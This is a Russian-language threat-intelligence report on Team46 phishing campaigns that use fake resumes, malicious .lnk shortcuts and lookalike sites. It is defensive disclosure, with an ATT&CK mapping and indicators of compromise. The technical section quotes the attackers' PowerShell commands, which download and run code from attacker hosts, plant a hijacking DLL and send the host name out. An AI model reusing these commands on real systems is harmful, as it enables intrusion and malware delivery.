Атаки группировки Team46
Четвертого сентября исследователи из компании «Доктор Веб» выпустили интересный отчет о несостоявшейся атаке на российского оператора грузовых ж./д. перевозок.
Нам хотелось бы добавить в этот отчет наши находки и дополнительную информацию о других атаках. Мы назвали группу Team46, потому что в своей сетевой инфраструктуре атакующие использовали домен cybers46.team.
Первая атака
В конце февраля команда Threat Intelligence экспертного центра безопасности Positive Technologiesобнаружили письмо с темой Re: Фронтенд-разработчик. Оно было отправлено с адреса jobs@rabotnik.today и замаскировано под резюме фронтенд-разработчика.
Сразу бросается в глаза написанный наугад номер телефона в подписи. К письму приложен запароленный архив Job Application_20240268.rar, который содержит файл Job Application.pdf.lnk, пароль от архива (Инна) указан в тексте письма. Кроме того, в письме есть ссылка rabotnik.today/resume/7952235986937661.rar, по которой скачивается архив уже без пароля, содержащий тот же самый ярлык. Из ярлыка запускается PowerShell-скрипт, который загружает другой PowerShell-скрипт по ссылке infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73), а тот скачивает документ-приманку по ссылке infosecteam.info/Job%20application.pdf и основную полезную нагрузку по ссылке infosecteam.info/base.php, которую нам не удалось получилось, но она была описана исследователями из компании «Доктор Веб».
Документ-приманка выглядит как резюме некой Клеблец Инны Федоровны.
Резюме содержит несколько фактологических ошибок. Письмо было отправлено в конце февраля 2024 года, а дата рождения — 10 марта 1994 года, то есть должно быть показано 29 лет, а не 30. Кроме того, фамилии Клеблец не существует в принципе.
Изначально в резюме был указан почтовый адрес 8067282501@mail.ru, а после изменен на inna.kleblets@mail.ru. Все это, а также метаданные документа говорят о том, что файл был сохранен с сайта hh.ru и отредактирован в LibreOffice Writer 7.3 7 февраля 2024 в 02:00:00 UTC-05:00, при этом в качестве языка интерфейса LibreOffice Writer был использован en-US.
Отличительной особенностью этой атаки является то, что все используемые домены имеют заглушки, создающие вид его легитимности. Так, домен infosecteam.info принадлежит якобы российской компании InfoSecTeam.
Это может создавать видимость того, что файл является не реальной атакой, а пентестом. Страницы сайта явно имеют машинный перевод. Кроме того, в футере сайта есть ошибка в адресе, отсутствует указание дома.
Шаблон сайта взят из магазина шаблонов для WordPress.
Интересно, что при попытке поиска названия компании в Google первые две строки занимает сайт злоумышленников, а реальная компания из Великобритании, имеющая то же название, — лишь четвертую.
Аналогичная ситуация наблюдается и при поиске в Яндексе.
Домен rabotnik.today также имеет заглушку.
У сайта есть русскоязычная версия, которая также имеет машинный перевод.
В атаке задействованы два домена — rabotnik.today и infosecteam.info, зарегистрированные 08.12.2023 и 19.02.2024 соответственно. Помимо этого, были найдены еще два домена — cybers46.team и cybers4646.my.id, которые были зарегистрированы 05.06.2023 и 03.06.2023 соответственно и так же резолвились в 162.0.236.151, как и infosecteam.info. Предположительно, они использовались для разработки атаки, что может говорить о том, что эта атака не первая. По домену cybers46.team мы назвали атакующую группу Team46.
Сама атака носила явно массовый характер: мы обнаружили почти 4000 одинаковых ярлыков (но с разными идентификаторами жертв) в архивах в открытых папках на infosecteam.info, загруженных туда в течение трех минут.
Подсказки при поиске в Яндексе тоже говорят о том, что люди часто сталкивались с описанным фейковым резюме.
Вторая атака
В апреле экспертами PT Expert Security Center также были обнаружены аналогичные вредоносные ярлыки с именами SCAN_4024_2024_04_02.pdf.lnk и SCAN_4251_2024_03_25.pdf.lnk, загружавшие по ссылке srv480138.hstgr.cloud/uploads/scan_3824.pdf другой документ-приманку.
Документ создан 26.02.2024 в 12:00:07 UTC+00:00 при помощи Microsoft: Print To PDF с именем Remote Desktop Redirected Printer Doc, что говорит о том, что злоумышленники получили доступ к документу по протоколу RDP, после чего вывели его на печать в формате PDF. Содержимое домена srv480138.hstgr.cloud являлось полной копией сайта elevation.store — бьюти-магазина в ОАЭ. Заглушка совершенно не соотносилась с документом-приманкой, но это может говорить о том, что этот сервер злоумышленники могли также использовать для атак в ОАЭ, но подтверждений не нашлось.
Технический анализ атак
В первой атаке ярлык запускает powershell.exe со следующей командой:
-w Minimized -ep Bypass -nop -c "irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex"
Каждому адресату отправляется ярлык с уникальным идентификатором. Ярлык скачивает и исполняет скрипт со следующим содержанием:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'http://infosecteam.info/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';$env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http://infosecteam.info/base.php' -OutFile $env:LOCALAPPDATA\Yandex\YandexBrowser\Application\Wldp.dll -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';"
Скрипт загружает документ-приманку и открывает его, а затем скачивает полезную нагрузку, которая использует технику DLL Hijacking, подменяя системную библиотеку wldp.dll для Яндекс Браузера. В скрипте в качестве User-Agent используется строка, относящаяся к браузеру Microsoft Edge версии 121, вышедшей 25 января 2024 года.
Ярлык из второй атаки запускает powershell.exe с аналогичной командой:
-w Minimized -ep Bypass -nop -c "irm https://srv480138.hstgr.cloud/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex"
Идентификатор также уникален для каждой цели. Ярлык скачивает и исполняет скрипт:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'https://srv480138.hstgr.cloud/uploads/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.';$env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https://srv480138.hstgr.cloud/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\Temp\AdobeUpdater.exe -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.1 YaBrowser/23.11.0.0 Safari/537.36';$env:LOCALAPPDATA\Temp\AdobeUpdater.exe;"
В этом случае полезная нагрузка маскируется под обновление Adobe Reader. Здесь в качестве User-Agent используется строка, относящаяся уже к браузеру Microsoft Edge версии 120, вышедшей 7 декабря 2023 года, хотя эта атака была произведена позже. Все ярлыки созданы и изменены 15.11.2023 в 11:12:27 UTC. Но в первой атаке имя компьютера — desktop-420!69j, имя пользователя — Putin[REDACTED], а во второй имя компьютера — desktop-819jaxj, имя пользователя — IgornWay. Второе имя пользователя выглядит как замена букв в первом при сохранении регистра. Такие различия в метаданных и строке User-Agent могут говорить о том, что за атаками стоит не один человек, а группа людей.
Заключение
Для однозначной атрибуции злоумышленников, а также их истинных мотивов все еще не хватает дополнительного контекста. Однако, судя по уровню подготовки и организациям, которые были атакованы хакерами, можно сказать, что мы имеем дело с АРТ-группировкой.
Мы продолжаем отслеживать активность группировки Team46 и ждем от нее новых атак.
TTP группировки Team46 по матрице MITRE ATT&CK
ID | Имя | Описание |
Reconnaissance | ||
T1589.002 | Gather Victim Identity Information: Email Addresses | Team46 рассылала таргетированные фишинговые письма по почтовым адресам из утечек |
Resource Development | ||
T1583.001 | Acquire Infrastructure: Domains | Team46 зарегистрировала несколько доменных имен для придания легитимного вида ссылкам через регистратора Namecheap |
T1583.003 | Acquire Infrastructure: Virtual Private Server | Team46 приобрела VPS у сервиса Hostinger и использовала технический поддомен на hstgr.cloud |
T1583.004 | Acquire Infrastructure: Server | Team46 хостила серверы на сервисе Namecheap |
T1585.002 | Establish Accounts: Email Accounts | Team46 использовала для придания легитимного вида письмам адрес |
T1608.005 | Stage Capabilities: Link Target | Team46 использовала собственные серверы для размещения архивов с вредоносными ярлыками |
Initial Access | ||
T1566.001 | Phishing: Spearphishing Attachment | Team46 рассылала таргетированные фишинговые электронные письма с вложенным RAR-архивом, защищенным паролем и содержавшим вредоносный ярлык, чтобы избежать обнаружения шлюзом электронной почты |
T1566.002 | Phishing: Spearphishing Link | Team46 в таргетированных фишинговых письмах также использовала ссылки на RAR-архив без пароля, но содержавший тот же вредоносный ярлык |
Execution | ||
T1059.001 | Command and Scripting Interpreter: PowerShell | Team46 использует PowerShell-скрипты для скачивания промежуточных стадий и основной нагрузки |
T1204.001 | User Execution: Malicious Link | Team46 пытается вынудить пользователей скачать архив с вредоносным ярлыком по ссылке, доставленной через фишинговое письмо |
T1204.002 | User Execution: Malicious File | Team46 пытается вынудить пользователей открыть вредоносный ярлык, доставленный через фишинговое вложение |
Persistence | ||
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Для закрепления в системе Team46 использовала подмену wldp.dll в папке с Яндекс Браузером |
Defense Evasion | ||
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Для выполнения полезной нагрузки Team46 использовала подмену wldp.dll в папке с Яндекс Браузером, что позволило обойти песочницу |
IOCs
Файловые индикаторы
Имя файла | MD5 | SHA1 | SHA256 |
Job Application_20240268.rar | 8fedb5dae41ad563f2276b90930aa341 | a35a21776eb16ed904ba09dd76a5f6dddd7aee98 | c801243a2e14b64ed1d87feef9ce6298d90d72eb2bbff3994d868424c2a2346c |
Job Application.pdf.lnk | c0df1e743bcc016245de4731fb7220b9 | e59284d6677ede89d525491956258d29cd83c59f | 823d625481fe8b0299850e9758e43b717b6874d42e0112f1b8281bcefedadd31 |
7952235986937661.rar | be930ec5fe56fce7abca7df85cb8fecb | 61b99ca03d7f2d19279e53a9e53b31eec49f5bc0 | c101e1f8b4bb6b498ab99a4cf7fd9e62a4126be16409effa379c4f78194b5707 |
ps1 | 760550ef574cc8f660314a3bf7c21a9d | dca725b40e8f5ba28cd78d285c0e6c77f6b96996 | c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73 |
scan_3824.pdf | 92c0e50193bfc15d29128d41e689625b | e4592319b8c7ed0c6859eac490f52a428b26410b | 62248642faaf84400a23b14c50fdf2ea37ece82262fd344963fbd57bd49973c7 |
Job application.pdf | 9ab5785378bf723844a0eea7f42a5084 | d77657f52745b3b9331dd55a431a59ac135cac64 | e92ad395f945596ff4e1afaf852119046f663285e4a79792c4db2cf97a2a8f61 |
Сетевые индикаторы
rabotnik.today
infosecteam.info
cybers46.team
cybers4646.my.id
srv480138.hstgr.cloud
162.0.236.151
203.161.60.229
149.100.138.167
Старший специалист группы исследования сложных угроз экспертного центра безопасности Positive Technologies
Руководитель департамента Threat Intelligence экспертного центра безопасности Positive Technologies
